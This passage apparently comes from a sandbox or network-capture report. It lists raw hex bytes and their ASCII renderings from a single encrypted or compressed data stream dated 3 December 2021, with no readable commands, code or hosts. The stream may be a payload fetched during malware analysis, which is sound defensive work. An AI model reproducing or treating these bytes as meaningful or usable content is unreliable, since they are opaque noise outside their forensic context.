                                              Data Ascii: E$I~BC_yQwAa<F+=b;eZ<,=4C11Zd8HFSahQI[2j8I^F[d9R.sJtWViF16cCjf_;|l:'?%(^2{2YDbvz[[bh%p`
                                              2021-12-03 07:24:05 UTC58INData Raw: dc f5 c7 e5 d5 76 7b 38 28 71 5a a4 0e e0 03 17 92 32 d9 ad 5b 12 b8 bf 84 4c 8e 9e 92 18 10 a8 cb 94 5c f9 24 c1 a4 d1 f0 87 2f 35 23 8b da 91 2e dd b1 70 96 56 bc 4a bb aa df d6 f1 40 f9 4c 7d ca 13 e6 35 21 37 be 85 99 97 ba 2c f1 b4 eb d1 eb f6 1f b6 de 62 2e b0 f8 a3 20 f4 53 e9 d5 f0 07 8c 18 b0 d5 1a f8 13 41 74 fe be 10 fe 4d ba 71 1d a8 83 f7 07 20 60 05 ea 3e f7 71 ed a9 a5 89 b0 4f 69 02 d2 26 c7 a1 cb 0e 48 8b 3e bb 16 ff 40 6b cf b3 de f0 cb 91 26 1f c9 2c 07 58 32 2d 7c cf c5 4a 0a 18 e9 6a 38 ab 74 63 f9 6a ec 80 77 8c 02 55 a3 a9 c1 67 f3 c4 d2 59 e3 0a da cb 5a 21 cc d6 3f 85 0f 8a 93 48 13 5e e7 f0 e5 7f 20 12 a8 43 22 04 a4 b5 e0 10 4e df 51 a1 44 c3 2e d9 21 73 fd ec 83 0e 28 4a cd 2c e8 ab 28 f4 61 cf 44 fc 58 62 58 22 66 0f 48 5e 89
                                              Data Ascii: v{8(qZ2[L\$/5#.pVJ@L}5!7,b. SAtMq `>qOi&H>@k&,X2-|Jj8tcjwUgYZ!?H^ C"NQD.!s(J,(aDXbX"fH^
                                              2021-12-03 07:24:05 UTC59INData Raw: a4 7d 1b 03 d1 66 c0 1e 0f c2 3d dc 51 ac 07 18 fe ad 39 e9 97 b3 ad 82 83 ce d1 8b c4 5b f8 1d 02 ce e8 1d 10 95 b7 d7 a8 96 46 b3 46 58 8a 0e 97 8d 51 cc 74 8f 03 af a6 92 f5 44 4f e7 6b 8d af 2c bd f5 a6 5f 6e dd 49 ca 1d 17 41 bd 3f b6 48 8c cb 6d 39 7d f3 63 5f 22 87 70 dc 00 88 6e 39 9f d9 35 e3 31 bb 6e 32 49 d7 8f b3 54 0d c6 4c f4 98 60 25 b4 80 f0 bc 62 1e 21 13 92 6e 3a bd e1 36 e9 a0 98 9b 9d b0 c2 cd ec db 06 ed 2e 93 d6 88 1b 35 5f 71 62 de 1b c4 38 11 ee 79 57 cd 97 0e 2a 84 67 36 f0 eb df d5 1a ca 24 f4 48 19 58 31 63 7f c5 05 e4 df 05 76 a7 ae 71 3b 93 10 32 d1 f3 58 69 d6 94 36 76 1e b8 08 2f d7 58 de ba db 0b fb 8b 7f 4b d1 57 29 1e da 32 82 17 c0 29 08 4a 3b 78 d8 94 ac 47 25 77 68 1c e3 b6 39 21 5d d9 90 9c 8f 02 1c 13 e8 97 13 af d3
                                              Data Ascii: }f=Q9[FFXQtDOk,_nIA?Hm9}c_"pn951n2ITL`%b!n:6.5_qb8yW*g6$HX1cvq;2Xi6v/XKW)2)J;xG%wh9!]
                                              2021-12-03 07:24:05 UTC60INData Raw: 1f 7e 8d f2 72 3c d9 b2 70 ec 55 bc 46 80 4b d5 fe 60 6b a4 4a 55 e2 02 e0 3a 21 3a bc 85 95 97 cf 2f f1 b8 d0 88 ed de e9 a6 d6 6d 2e 82 fe a3 20 f4 ab ec d5 fc 07 4d 18 b0 d9 1a f8 1c 41 fd f9 be 10 fe 7c bc 71 1d a8 3b f6 07 2c 44 88 e2 16 d3 60 e8 be b5 89 b0 4d 69 0e d2 20 ba d2 e9 06 5e 73 2c a3 00 de 7f 6d e7 50 cb d8 e3 80 20 3d f8 d2 06 0d 71 02 6a c3 1e fc 03 09 e1 14 1a 81 5a 67 e8 65 eb af 36 aa 00 5f b3 96 88 3c f1 c2 d2 59 9f 28 c9 c3 74 70 df df 56 f2 26 88 99 90 0d 73 de c1 8a 5b 28 01 a4 7a 12 15 a0 97 3c 11 90 cc 1b af 71 c3 28 c2 3a 50 cd 52 83 08 4d 6b e7 14 ee ac 33 22 0c d1 6f fb 78 bc 0d 51 05 39 48 58 9a 7c 7b 6f 88 28 99 12 c1 91 c3 c6 b6 b6 ff a8 1c 1a a1 c4 36 e9 32 86 10 14 da ae b2 d1 10 ae 3a c3 c6 19 b5 2a 93 4e 2f 67 8f b6
                                              Data Ascii: ~r<pUFK`kJU:!:/m. MA|q;,D`Mi ^s,mP =qjZge6_<Y(tpV&s[(z<q(:PRMk3"oxQ9HX|{o(62:*N/g
                                              2021-12-03 07:24:05 UTC61INData Raw: ae 56 76 70 02 86 8a 8f bc 65 d0 d9 ba b2 97 f5 45 08 29 68 8d a3 b1 ef f2 c9 78 44 ee 4e db 1a 33 19 bf 28 66 34 a0 d8 6b 2e 72 dc 50 cf c5 79 78 fe 42 9d 4b 1b a2 07 27 c1 15 b5 1d 82 61 f9 87 be 7a 3f ee 74 fe 46 53 ea a5 91 0c af 73 4e 2c 02 80 e0 8d 82 39 c8 16 5f 89 e7 8b 66 d1 b1 fc dd 17 ef 10 18 28 6d e4 eb 4b 4f 7a ee 1b c2 33 02 e1 74 ed cd 86 06 2d ae 49 59 11 e0 01 dd 03 bf 1e d6 4a 0e 76 0d 62 7f cf 0f e2 f7 5c 76 a7 a4 84 5d 92 10 9a dd 80 7e 7d d6 9e 25 6a 0f be 1d 07 ff 5c de ee cc 86 fc 0c 7e 4a c2 86 39 16 cc 59 e6 17 c0 37 aa 5b 32 7f fc bf 64 bb 25 7d 79 9e f7 9e 01 33 4e d9 bf c1 88 02 1c 12 ea 99 1d ad 3b 61 e3 6e c6 bf 75 bf dd b3 d5 20 df 33 e6 8f b6 f4 3f 2a 23 74 7c d9 0c de c9 f7 97 6b 56 fd 6c 5b 81 6d 63 d8 60 da b3 51 74 80
                                              Data Ascii: VvpeE)hxDN3(f4k.rPyxBK'az?tFSsN,9_f(mKOz3t-IYJvb\v]~}%j\~J9Y7[2d%}y3N;anu 3?*#t|kVl[mc`Qt
                                              2021-12-03 07:24:05 UTC63INData Raw: 71 19 95 60 b2 21 c7 6e 6b d5 f6 2f 4d 09 b7 cf 29 24 1a 69 6a 66 af 11 cb 72 2c 71 1b 80 42 e6 00 38 73 65 7e 07 de 6c e4 8f 10 a1 9e 4f f5 19 c3 17 9e f2 50 0c 48 8d b1 a3 00 e9 5a 4f 01 56 dd f0 51 91 27 28 e2 33 54 ce 4c 02 61 c2 dc 21 9f 18 e6 1a 12 89 e1 65 e8 63 61 96 1f b5 0f 4a d9 24 d9 48 cc d0 c4 c3 9d 27 c7 da 4a bb cc d8 4f 8f 18 16 88 91 03 68 d9 5b f4 78 35 15 b4 f7 0b 03 bb aa 28 8c 81 cd 6b 9f 53 3c 2e d3 32 e4 9f 51 9c 19 34 dd f4 13 f7 b3 34 b6 72 ce 71 e2 52 e2 58 22 27 a7 59 59 96 6f 7c fa b1 78 84 09 d1 62 fa c3 a9 ac f8 3d 1c 1a d1 fd 14 69 34 97 19 99 ce 81 af ce 30 28 55 e5 c4 85 a2 3c 85 79 7a ff 9e b7 91 08 0e fe 4c f7 2e 83 88 2e 47 02 a0 27 b1 75 8b 13 db f6 9e 41 f4 6c f9 58 82 42 33 cb 32 59 62 54 ac 63 17 e7 b6 7e 9f 08 86
                                              Data Ascii: q`!nk/M)$ijfr,qB8se~lOPHZOVQ'(3TLa!ecaJ$H'JOh[x5(kS<.2Q44rqRX"'YYo|xb=i40(U<yzL..G'uAlXB32YbTc~
                                              2021-12-03 07:24:05 UTC64INData Raw: 9a 59 a0 db 17 c8 f5 9c 82 cc 22 8c 1f 59 f7 06 bb 64 10 39 fd 8d b5 3d b7 ef 74 fe 3a 7b e2 ad f8 e6 bc 62 55 15 4a 96 6e 3c d2 51 37 e9 aa 3a f0 85 bc ca a4 fc cd 15 ef 16 4d d4 92 1b 24 4f 7b 42 43 16 cb 00 dd ec 07 57 c4 e9 bd 21 86 7b 4a 02 fc cc cd 3d 24 15 fc 4a 1f 24 28 70 e5 dc 0b eb e6 9d 19 17 a5 59 57 81 15 4b bd 81 7e 62 c5 98 34 75 27 e4 18 07 f9 33 6c bd cc 8c e8 75 7e 5c 3c 5e 29 13 e4 17 e2 17 c6 42 18 5a 33 66 d8 42 65 50 db 7c 68 1f df c2 14 25 5b b0 35 10 88 08 08 ec fa 89 fc a6 a5 71 ca 4a 92 aa 70 86 2f 01 d4 20 ca 2c 0b 88 a0 1b 38 52 cc 70 78 8e 20 f0 cd 98 23 61 4f e4 7e a5 91 7d 8a 27 01 a9 89 5f 65 86 ec 8a 69 b0 60 39 9a 72 ad f4 0f 1b ee 0f c5 c1 7e c7 ac c9 5c 9d 2e 42 e5 6e d7 d1 32 49 86 6a b6 0a d2 d9 d9 0c b8 77 f9 dd 38
                                              Data Ascii: Y"Yd9=t:{bUJn<Q7:M$O{BCW!{J=$J$(pYWK~b4u'3lu~\<^)BZ3fBeP|h%[5qJp/ ,8Rpx #aO~}'_ei`9r~\.Bn2Ijw8
                                              2021-12-03 07:24:05 UTC65INData Raw: b6 44 58 bf 85 d1 08 94 d3 fa 08 41 03 9a a4 36 dd 47 66 69 e1 ca 2a de 9e 33 3d c5 35 16 56 4c 0f 77 de c9 c1 2b 60 e5 05 1a 81 50 65 e8 69 5f 96 12 bd d6 46 af a9 c2 5e cd f1 33 57 02 97 ce fa 6b 31 ce d4 59 13 b9 9b 9d 18 ab 6c 15 d4 fa 6c 26 2a bd 7a 1e 15 a8 b7 2f 1b 0a e2 1e 8d 73 c5 06 f7 32 78 84 f4 92 05 35 97 f6 1f f9 a7 35 fc 70 c5 7f f7 63 7d 69 f9 54 d4 49 5e 83 66 63 77 a4 6c ba 04 d4 de d3 76 b3 b0 ee b0 2c 0c ee 7a 27 fc 25 82 00 12 c6 f5 40 d1 10 a2 46 f4 d5 08 a7 13 1b 64 6c 65 99 3d 89 28 2e 00 58 e3 3a 37 3a 29 58 29 9e e1 a0 72 9e bd f2 6a 8f 47 f8 5d fe d6 84 c9 13 ef 12 d8 4a e5 ac ff 0c c8 f3 5b 89 9e 80 86 26 38 f4 4a 32 24 4c 6c 96 e1 7c 07 14 59 0a ff 98 60 46 c0 e3 fa f4 ce 67 9d 9c 4c f5 86 0a ad 52 a8 a3 e5 aa 92 1e 26 e3 b9
                                              Data Ascii: DXA6Gfi*3=5VLw+`Pei_F^3Wk1Yll&*z/s2x55pc}iTI^fcwlv,z'%@Fdle=(.X:7:)X)rjG]J[&8J2$Ll|Y`FgLR&
                                              2021-12-03 07:24:05 UTC66INData Raw: fe 6e b3 e6 d5 e0 ce 4a 97 09 28 71 41 9f 1a 9a 6f 04 85 29 c6 66 b5 43 a9 a9 8d 9f b5 d5 b9 51 07 b5 d1 9b ae dd 35 e0 e3 12 f1 87 2f 0c 70 9c 57 90 3d d9 b9 4b 52 44 9e 5a 82 5a 50 e9 f7 68 a5 ee 6c ee 14 c8 92 09 df b7 ad c5 bf 53 25 d9 58 c2 8c e1 de cd a4 d6 61 2e 88 fc a3 2c b3 66 ef d5 f0 3e c6 0f 66 c0 1e ee 14 7e e7 fd be 16 d7 41 98 60 3d 96 cf e0 8b 19 6c 14 e3 b4 c8 55 f9 87 1d a1 9e 45 76 28 48 37 94 d2 e8 1a 60 35 2d b2 0d da 7e 7e e9 41 50 f7 cd 80 21 24 cd 3d 24 44 4c 12 f2 f0 c3 5b 02 ab f0 26 08 81 da 65 e8 69 e2 f8 94 95 00 55 a4 ae e0 bd d2 c0 d8 65 d0 df 27 34 4b 34 ce ce 47 8e 18 b2 1c 94 1c 7b de c8 cd 31 2e 01 a4 04 03 05 a4 b5 13 01 81 c5 5c d9 77 c3 28 bc 2b 79 8e 5c ba ca 22 41 e5 05 fe b4 2b fc 70 d1 7f ef 64 51 09 33 31 23 9e
                                              Data Ascii: nJ(qAo)fCQ5/pW=KRDZZPhlS%Xa.,f>f~A`=lUEv(H7`5-~~AP!$=$DL[&eiUe'4K4G{1.\w(+y\"A+pdQ31#
                                              2021-12-03 07:24:05 UTC67INData Raw: 3c ff ba 61 19 3a 7e 6e 4e a3 2f 5d 8a f4 4d be 00 03 ee 89 b4 e5 9b ad a1 9e a2 a9 67 83 40 fd ce 03 1c 9a 40 25 db 85 49 c6 97 96 4c ad 45 75 74 06 19 30 90 09 5e c3 ca b1 88 82 f5 44 76 00 7d 57 ac b1 ef 61 ae 4f 4b f9 92 5e 76 85 41 b6 3f b6 48 87 cb 66 39 65 fc bf b1 d8 f6 cf e3 46 9f b8 be aa 07 27 ca 15 bd 78 29 64 77 3a ab 88 14 fc 67 fa b3 38 ea b1 97 d4 28 73 5b 2c 1d 06 b4 2c 92 f9 27 ef b1 96 f0 99 a1 cc 23 cd 24 06 ff 2e 45 c7 96 0a 3b ca b0 cc f2 0b d3 3f 00 e0 16 52 dc 88 98 31 82 60 57 85 30 41 d9 14 93 06 f2 de 26 dd 38 62 75 e7 db e3 f7 93 5e 83 a4 59 57 98 01 36 cb 56 6d 66 c7 90 34 62 3e 16 c2 08 da 74 e9 bc cc 8c ef 84 57 72 c2 5f 32 c8 cc 4a cc 17 81 31 aa 5b 33 6c cc bc 62 46 25 7d 69 18 f7 9e 06 27 5d df 88 11 88 02 06 12 fb 9e 19
                                              Data Ascii: <a:~nN/]Mg@@%ILEut0^Dv}WaOK^vA?Hf9eF'x)dw:g8(s[,,'#$.E;?R1`W0A&8bu^YW6Vmf4b>tWr_2J1[3lbF%}i']
                                              2021-12-03 07:24:05 UTC68INData Raw: af 3f 1c 7e 81 cb 91 2c d1 d7 7a 71 55 b6 5f 97 3e fa d7 f7 62 b7 45 6c c5 17 8f 15 08 df b7 94 96 a8 3c 05 f0 b2 c9 93 f3 7b 32 a5 d6 6a 15 a6 e2 2e 0d dc 4e ec c6 f3 26 c0 12 b9 5d be d7 3a 68 6a f0 af 12 c0 43 b4 78 95 37 c0 df 11 27 6c 1e f3 12 c7 62 e8 b9 ad 89 88 4e 69 02 d5 01 85 d8 86 2b 49 8d 27 a3 0e e7 54 00 cf 57 dd fa dc 89 4f 1c ef 2c 0d 59 5a 06 68 cc 4d ec 6c 25 e0 05 16 ba 73 4d fb 62 fd 8d 09 ad 6f 41 a4 b8 c2 43 db ca 0c 4a a9 08 ef cb 5c 2d ce d4 78 b3 0c 8a 9f 9c 34 43 cf c7 ef a1 2a 07 88 6b 1a 45 b8 bf 3e 10 90 ca 74 89 73 c3 2e e4 33 78 8e 61 82 0e 22 54 e5 14 e8 b1 22 2a 62 d2 5e fd 72 03 58 22 27 ab 48 5e 98 06 0b 67 a0 75 96 1b a8 0b ea c4 bc a3 e8 a3 25 7b cf e0 3e fa 31 86 1f 14 da 90 a1 d5 9e 1f 3a 13 c5 19 b9 30 9d 71 b6 74
                                              Data Ascii: ?~,zqU_>bEl<{2j.N&]:hjCx7'lbNi+I'TWO,YZhMl%sMboACJ\-x4C*kE>ts.3xa"T"*b^rX"'H^gu%{>1:0qt
                                              2021-12-03 07:24:05 UTC70INData Raw: 96 5d df ec 70 63 05 9d f4 7c d2 4d d8 d5 b4 8b e7 e0 41 61 25 14 89 a5 a6 ca 62 a5 5e 40 9d b4 cb 17 11 3f 46 29 60 51 82 f2 14 2c 74 cb 75 20 d9 78 7e dc 0b 8b 6e 35 e6 fb 26 cb 0c d4 93 39 61 f3 85 9b 2f 03 ee 72 dc 19 6e fb b2 ae 4d bf 62 59 4e ef 93 6e 30 d2 1c 37 e9 aa 90 c9 e3 b4 c2 b1 c5 59 02 ff 28 bb 41 91 1b 33 2d 96 53 d9 11 ad c4 10 ee 0d 5f e5 05 08 20 80 59 dd 15 ea d9 f7 92 96 17 fa 39 f2 36 39 68 10 32 0e e2 fd 91 5e 24 a0 59 5b ba 94 3c dc 86 56 ed d2 9e 23 03 f3 bf 1c 0d 90 a1 df bc c6 8e d4 0d 7b 4a c4 77 bc 12 cc 4a ce 90 c4 2d ac 28 cf 6d cc b6 0b bb 24 7d 73 12 df 16 14 25 5b f7 0e 15 88 04 34 85 f8 9f 04 d4 39 61 cf 68 a0 53 71 80 4a a5 dd 4f 3e 39 f5 83 a1 3f 2a 20 ce 71 68 f7 25 f0 cb 89 6e 61 4f e4 62 4a 94 04 74 24 61 fc cb 48
                                              Data Ascii: ]pc|MAa%b^@?F)`Q,tu x~n5&9a/rnMbYNn07Y(A3-S_ Y969h2^$Y[<V#{JwJ-(m$}s%[49ahSqJO>9?* qh%naObJt$aH
                                              2021-12-03 07:24:05 UTC71INData Raw: af c7 61 17 bf c2 fd d8 23 b1 eb ff f6 2f d0 08 b0 d3 09 ff 2f 68 a4 f9 bc 1a cc 52 be 70 08 b0 d8 f7 2b 24 6c 14 74 16 d9 62 fb bc bb 99 8c 4d 69 08 c4 19 9c cb 17 0d 64 84 3c b5 11 e9 46 f3 fd 45 d5 f0 dc 88 3f 3b 10 2d 2b 40 5f 8b c9 d8 19 4c d5 84 ca 05 1c a8 67 60 f7 6e ee 8f 18 bb 08 4f 5b b9 e4 46 c2 c7 c5 40 de bc c3 d8 54 27 cc d7 4f 90 f0 8b b5 9a 02 f6 e4 c7 e5 7e 39 05 bd 65 09 0c a4 ae 36 0f 81 34 75 a5 7a d2 28 ce 03 56 91 44 90 06 22 50 ed 09 16 aa 0e 23 72 ce 74 e4 51 fe 46 31 2f 3b 59 56 96 67 94 67 8c 78 8a 16 ca e1 f8 d7 be b0 ff a9 12 12 30 e1 18 b1 25 93 08 03 d6 97 b6 41 07 f7 48 87 cd 08 b5 aa 82 39 77 01 ef b9 9f 2e bf 1b 13 ee 4c 7f 90 38 5e b2 a8 e4 b7 10 f4 38 dc 6c 1e 59 fb 10 f8 a7 f3 4c 3d e9 83 c6 42 0b b5 9c 66 e9 b8 5d 18
                                              Data Ascii: a#//hRp+$ltbMid<FE?;-+@_Lg`nO[F@T'O~9e64uz(VD"P#rtQF1/;YVggx0%AH9w.L8^8lYL=Bf]
                                              2021-12-03 07:24:05 UTC72INData Raw: af 75 cd 5b 8d da 7e 75 29 e1 89 6e 33 83 16 23 a4 8e ba 6e 3e 76 23 9e bc 41 02 d6 38 f5 98 6a ea b0 97 df aa 0d d6 3c 13 94 7d 3c 95 a6 37 e9 aa 89 e5 8d b5 d5 d8 64 da 06 f9 41 0b d6 92 11 26 59 62 7a c7 18 c2 3f 00 e8 2f 70 cd 86 06 08 a9 71 59 1b d3 23 df 05 95 06 fb 62 09 37 39 49 6c c7 1e ea ce 75 76 a7 a4 48 55 86 38 a0 d8 80 78 7e 5b 99 25 70 0e aa 08 13 d7 ff de bc c6 92 d4 51 7c 4a c4 49 b5 11 cc 4c e7 03 d4 39 82 f8 33 6c c6 94 f8 46 25 77 68 1e df 90 11 25 5b cc 8e 00 80 16 34 8a ff 9f 04 b1 48 67 cf 62 ce ba 64 94 68 10 d5 20 ca 2c dd 53 b5 e5 3f 24 50 72 50 d0 25 e4 df e3 b9 c3 4f ee 60 73 0c 6b 74 2c 72 fd a1 41 73 ae 74 fd 4b b4 76 b2 8e 78 b7 78 0e 0f fa 26 75 db 6f d7 ae c9 d1 9a 2e 42 51 f2 ca c6 1a 14 96 7e a4 80 60 c3 c1 2e cd ef f9
                                              Data Ascii: u[~u)n3#n>v#A8j<}<7dA&Ybz?/pqY#b79IluvHU8x~[%pQ|JIL93lF%wh%[4Hgbdh ,S?$PrP%O`skt,rAstKvxx&uo.BQ~`.
                                              2021-12-03 07:24:05 UTC74INData Raw: a1 ac b2 81 14 f5 19 ca 17 80 cd 8b 90 59 83 32 a7 18 ce cd 7e e9 49 cb d0 18 80 20 37 72 3d 09 4d 4a 25 85 cf c3 5b 9f 18 ef 1a 04 89 af 65 e8 63 61 96 16 b5 19 4a c1 24 d9 41 cc da f2 f9 8c 20 d8 57 4d 29 c2 c4 4f d6 92 9b 97 89 00 5b 1c c7 e5 7f b6 10 ac 74 07 1b fe 23 2f 1e 8f d4 6f 15 62 cd 31 cc 2d 2b 12 47 8d 03 3d 51 68 3f e8 ab 23 39 6d d8 60 ed 52 fa 58 22 27 a7 59 50 9e 6a 65 fa b1 71 83 0d af 62 fa ca af 90 20 a1 0d 1d 52 f1 3a f3 2b e0 85 14 d1 9d af 93 8c b9 5b f9 db 55 2f 2a 94 7b 73 24 13 a1 80 36 0e f8 4c f7 2e 83 88 27 47 2a 96 52 a0 72 94 ad dc 64 90 4c f4 41 73 d5 9d 5a 27 cf 90 d9 62 54 30 ee 08 ff a5 7b 7d 94 97 50 37 02 fa 55 3e 28 29 e6 94 e2 75 1a 18 3d b8 ec 96 79 5a ef 1e e9 e0 bd d9 8e 92 59 e3 91 68 31 47 80 ce f2 ae 4a 13 8e
                                              Data Ascii: Y2~I 7r=MJ%[ecaJ$A WM)O[t#/ob1-+G=Qh?#9m`RX"'YPjeqb R:+[U/*{s$6L.'G*RrdLAsZ'bT0{}P7U>()u=yZYh1GJ
                                              2021-12-03 07:24:05 UTC75INData Raw: 14 a5 f5 1c f5 ad 98 e8 8a 4e c3 9b ef cc 0b ff 27 8f 28 93 37 37 75 68 79 5a 1c e8 39 11 f5 37 5e cd 77 0d 20 86 d1 59 11 fb ac 65 05 95 1d f7 55 12 1f 82 62 7f c5 05 e4 df 38 72 a7 a2 71 e3 92 10 32 af 96 7c 68 dc 93 2c 1f 18 bc 1c 0d d2 50 f6 1e c8 86 fa a3 67 48 c2 55 3f 3c c5 64 45 13 c0 2b c5 42 31 6c c6 af 68 50 36 76 41 86 f6 9e 10 34 51 ce 8c 8b 9b 06 0d 16 94 85 00 a7 cf 73 c1 74 dc a3 48 f3 41 b3 d5 31 ce 29 f8 13 a5 e3 28 34 b2 f9 51 d0 2e d8 6f f3 91 66 67 50 6a 5b 9a 78 71 37 64 de 81 49 67 8c d5 be 4a b2 60 4c 5e 79 b7 73 09 1c ff 09 c2 f3 13 df ba e7 10 14 29 44 47 7e de c9 0b 1a 94 7b b5 0a d2 cc d2 34 f4 63 ed cf 8d e3 57 4a e2 39 f2 5c 4d 07 0c 37 4e ad 96 b6 83 d1 b0 3a 79 e1 68 96 8e 8e 7b cd 2d 0f e5 7b ab 4a fc 19 ea 9d a9 40 2b a4
                                              Data Ascii: N'(77uhyZ97^w YeUb8rq2|h,PgHU?<dE+B1lhP6vA4QstHA1)(4Q.ofgPj[xq7dIgJ`L^ys)DG~{4cWJ9\M7N:yh{-{J@+
                                              2021-12-03 07:24:05 UTC76INData Raw: 1c a8 6f 55 ec 63 de 87 18 aa 20 55 a5 a9 e0 d8 d3 c0 d8 5d 98 36 f0 59 5d 27 d7 b0 44 9c 0e 80 93 48 10 53 f8 c7 e5 75 02 39 a2 6b 10 da a4 b9 14 10 91 da 74 89 73 c3 2e d3 27 6d 8e 5a 99 0e 22 40 fb 16 c0 b7 20 2a 69 e3 7d cb 71 62 f0 20 27 3b eb 5e 89 64 7c 6b 98 e5 99 12 c7 fe e2 db b8 4e ef 8d 03 cd ee e0 34 eb 1c 83 19 05 d5 8a af df 1d a8 5c f9 3a 18 9f 23 4a c5 6c 63 8e 98 9a 28 2e 0b 23 ea 2c 1f 93 2d 37 3d b4 bb aa 7e 89 3c cd 63 90 4c 15 4e c3 d6 97 6d 1b ea 12 df 74 7c 82 ff 06 ea bf 68 d6 8b 9c 5d ab 1a eb 56 cd 36 6e 6f 81 c4 56 11 07 77 32 d5 b6 66 55 c5 e3 a9 d6 bf 45 9f 83 57 eb 96 12 a3 4f 7e c9 cd b3 44 5b ab e4 b8 f9 53 c9 ee aa ff e2 52 19 c5 c0 a4 52 8e 50 5b 55 0a ec 0f e1 83 58 8f 68 3d bb f5 65 7b e4 ce b3 bb 47 53 89 3a 50 66 43
                                              Data Ascii: oUc U]6Y]'DHSu9kts.'mZ"@ *i}qb ';^d|kN4\:#Jlc(.#,-7=~<cLNmt|h]V6noVw2fUEWO~D[SRRP[UXh=e{GS:PfC
                                              2021-12-03 07:24:05 UTC77INData Raw: df 14 83 1c d7 51 0e 30 2e 9c 7e e3 0d fa fc 99 71 b1 5a 58 71 90 07 33 dc 87 66 96 d7 b2 27 5b 0d 95 ff 05 84 35 de bc c8 ac de 89 7c 37 ab 5f 38 12 e6 4c e6 17 d3 1d a8 5b 1b 6c cc bc 62 46 25 6c 6f 11 dc 85 10 22 4a 21 86 3d 8a 1a 17 12 fc 89 fc a6 e9 62 d8 69 cf a9 68 7e 41 9f d7 0b c2 13 16 8b cd 8f 39 32 d9 5f 72 d2 27 8d a1 f7 91 64 65 ee 6a 5b 83 5b 76 26 49 f6 b0 49 61 86 ec e8 5d b9 4b 24 89 7f a0 87 1b 37 ec 16 dd db 68 cb 44 e0 2b 9b 39 4f 47 78 d5 38 1b 39 80 41 b2 83 20 c1 ba 4f e5 73 fd f1 b8 6c 7b 37 89 38 e1 49 76 16 1a 20 c1 8c 85 a1 83 76 b0 3a d6 c7 79 96 8e 15 7c c9 3c 18 e4 1f 82 77 fe 01 eb 4d bb 56 d5 a4 2e d0 f4 f7 92 b6 47 11 27 67 9d d6 63 06 0c da 0b f1 00 5a 66 72 dc 6a df 82 b8 e0 c4 77 79 09 28 71 43 b9 07 93 91 17 92 38 43
                                              Data Ascii: Q0.~qZXq3f'[5|7_8L[lbF%lo"J!=bih~A92_r'dej[[v&IIa]K$7hD+9OGx89A Osl{78Iv v:y|<wMV.G'gcZfrjwy(qC8C
                                              2021-12-03 07:24:05 UTC79INData Raw: 6b 1a 04 a4 bf 3e 12 b8 dd 74 89 79 c0 03 d8 1a 46 8b 56 85 7d 04 43 e5 1e 92 a9 51 7b 62 c9 68 94 31 63 58 24 25 38 60 1c 8c 75 6c 09 88 7d 9b 18 a8 c5 ea c4 b0 b2 81 e3 0c 1d c8 e3 1c d6 31 97 1f 6a f7 84 b0 da 7f fb 54 e5 c2 1b dc 79 9b 66 6a 60 a7 f0 8b 28 28 6e 64 f5 2e 15 f6 7c 59 23 b0 b9 cf 30 95 31 cb 69 a7 07 ee 4f e9 ab bb 47 2c e5 7d 8e 63 54 aa d5 18 f3 99 59 89 bc 97 50 ab 1b f4 4a 22 21 49 51 9e ec 6d 03 f9 70 08 ff 80 6d 55 c8 e3 17 e1 91 47 88 97 4a e1 8e e5 bd 6a 82 e3 e3 81 77 05 d0 9f b9 d1 43 e3 cc a2 93 82 2b 19 cf c0 e1 4c 8c 50 42 69 17 e6 2a e1 8a 47 96 96 3c 86 ed be 72 ff ce b6 84 ad 52 a5 32 44 72 51 7a 96 ed e1 cf 43 82 04 6d b5 fe d3 da 0b 27 2f 40 00 32 9d 98 03 3d ff b4 43 2d 29 71 1b bc 14 27 d7 17 dc 5b bf 13 39 f8 85 8d
                                              Data Ascii: k>tyFV}CQ{bh1cX$%8`ul}1jTyfj`((nd.|Y#01iOG,}cTYPJ"!IQmpmUGJjwC+LPBi*G<rR2DrQzCm'/@2=C-)q'[9
                                              2021-12-03 07:24:05 UTC80INData Raw: 0a 7f 4a c2 c3 3e 09 df 55 7a 11 df 39 8a bc 33 6c cc 20 62 59 30 5d cb 1a f7 9e 8c 23 42 c9 98 02 14 04 03 05 db 3a 02 a7 c5 fc c9 7d d7 8e c0 80 40 b3 49 26 df 21 ea f0 2a e3 26 28 fd 9b 50 d0 24 6c cd e8 8a 7f 00 72 6c 44 8c 74 7b ba 67 e9 ad 56 26 1a ea e6 55 ad 75 a3 8f 67 a8 59 f7 1b ee 0e 4a dd 70 fd a5 9a 9b 9f 31 65 58 6b 51 c0 05 37 a2 e6 b0 a8 c3 5f c7 3b c6 53 1c db 9a 6e e4 4c fd 1c fe 06 c0 10 05 05 cd fa 1b a7 b4 50 af 37 ef c1 66 a0 b8 df 57 d2 3c 83 f5 fe ab 7b 72 19 e0 4d 20 46 34 8c 22 2c e3 fc 92 2d 59 f0 0c 6b 49 fd 61 2d 73 de 6f b6 20 bd 62 58 fe f4 da e0 f8 ff e3 ef 55 16 05 6e 25 15 03 8c 97 0b 0e 3e cd 5f a6 99 b8 bf 95 d5 a0 dd a2 07 5f 39 c4 a3 8e ec b8 c1 93 07 d3 5b 29 1d 7e 17 dc 88 0e c6 b7 c4 76 4a 88 53 a3 d1 da c9 c2 48
                                              Data Ascii: J>Uz93l bY0]#B:}@I&!*&(P$lrlDt{gV&UugYJp1eXkQ7_;SnLP7fW<{rM F4",-YkIa-so bXUn%>__9[)~vJSH
                                              2021-12-03 07:24:05 UTC81INData Raw: 6c 60 b3 76 85 01 cc fe fa cf aa 4e ef 8d 1c 0c cb c8 81 ed 34 91 31 71 df 86 ba c3 16 b5 46 ee c4 08 b8 23 64 67 40 69 8d 98 1b 28 2e 0b 40 ee 3d 14 99 38 53 38 48 ba 8c 60 9c 19 79 6e 8f 40 c3 3b ef c4 99 52 b6 fc 17 c5 71 5f ac ee 0d f9 57 5a a5 9d e4 ea ab 13 fe 47 29 24 49 7a 94 e7 75 05 f9 70 08 f0 89 6e 44 c5 cb f7 1f 42 ba 80 8e 59 ed 96 0a b7 50 7e c9 cd a9 83 14 a0 e4 a8 da 58 db 10 a1 bc fd 7b 1c f7 e0 35 b3 73 59 7b 59 15 f5 32 e4 8a 0e 9e 96 3c 3c fb b5 48 f2 c2 9a a2 53 5b 9e ce 5d 55 53 65 8c 13 e8 fb bf 94 23 62 b0 98 8b db 27 21 12 6a b9 d0 9f e9 74 24 f3 b0 61 19 d5 73 4a c2 03 2b d3 35 c5 a5 be 2c 0b d1 87 8e 24 bf 2e b2 92 a1 20 ca 8c 40 fd e4 1d 7a 01 f6 32 0b b8 9f 4b a8 85 7c a9 56 85 63 0f 97 2b 87 d3 5c c4 d4 97 e0 9a ed 56 99 0c
